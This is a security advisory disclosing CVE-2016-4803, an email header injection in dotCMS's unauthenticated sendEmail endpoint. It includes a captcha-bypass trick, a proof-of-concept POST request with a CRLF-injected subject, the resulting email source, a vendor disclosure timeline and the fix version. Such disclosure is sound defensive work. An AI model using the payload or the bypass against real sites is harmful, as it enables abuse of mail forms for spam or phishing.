Title: CVE-2016-4803 dotCMS - Email Header Injection
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: Email Header Injection
Vulnerable version: before 3.5 / 3.3.2
CVE: CVE-2016-4803
Vendor: dotCMS (http://dotcms.com/)


# Description
dotCMS has an email sending functionality at path /dotCMS/sendEmail/
Some parameters are vulnerable to Email Header Injection.


# Preconditions
There is no pre-condition on authentication or on authorization to
access this functionality.

If captcha is required for the web page, then the only precondition
would be captcha. However, captcha is renewed only when you access the
captcha image - in other words, you can load it once and manually set
the correct value. After this step the "captcha effect" is bypassed.


# Proof-of-Concept
Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1
on 7th of December 2015.

## Value for subject (%0D%0A is for \r\n):
subject=subject%0D%0AX-PoC-of-New-Line%3A+True


## Proof-of-Concept POST request:
<code>
POST /dotCMS/sendEmail HTTP/1.1
Host: demo2.dotcms.com
...
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 218

from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send
</code>


## Received email source:
<code>
Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net>
From:  myemail
To: youremail
Subject: subject
X-PoC-of-New-Line: True
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="----=_Part_4_698773753.1449476889786"
X-RecipientId: null
Date: Mon,  7 Dec 2015 03:28:09 -0500 (EST)

------=_Part_4_698773753.1449476889786
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

... removed ...
</code>


## Result

>From the received email source, it is visible that the subject value
created 2 different lines:
<code>
Subject: subject
X-PoC-of-New-Line: True
</code>

Proof-of-Concept on how to send a multipart email with an attachment
and a more detailed description is available at:
https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html


# Vulnerability Disclosure Timeline

2015-12-04 .. 07 | me | detected vulnerability, wrote Proof-of-Concept
2015-12-07 | me > dotCMS | sent a letter with detailed description of
email header injection and some related vulnerabilities
2015-12-14 | me > dotCMS | sent another letter with SQL injections
vulnerabilities and asked feedback about "email header injection"
vulnerabilities
2015-12-14 | dotCMS > me | they were going to review my emails and
asked to resend "email header injection" description
2015-12-14 | me > dotCMS | I resent "email header injection" description
2015-12-14 | dotCMS > me | they were planning fixes in upcoming
release, estimated to beginning of 2016. They thanked and wrote
"security is something we take seriously"

2016-04-07 | me > dotCMS | 5 months since first report, what is the
situation with reported vulnerabilities?
2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by
sanitizing and email header injection #8841"
2016-04-07 | dotCMS > me | email header injection will be fixed in
3.5, which is estimated to be out in mid-April

2016-04-19 | dotCMS | dotCMS version 3.5 release
2016-05-09 | me > dotCMS | asked confirmation and version numbers
about fixes for CVE and Full Disclosure
2016-05-10 | dotCMS > me | email header injection is fixed in versions
3.5 and 3.3.2.
2016-05-10 | dotCMS | dotCMS version 3.3.2 release
2016-05-24 | me | Full Disclosure on security.elarlang.eu


# Fixes
Update dotCMS at least to version 3.5 or 3.3.2.

https://dotcms.com/docs/latest/change-log#release-3.5
https://dotcms.com/docs/latest/change-log#release-3.3.2

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com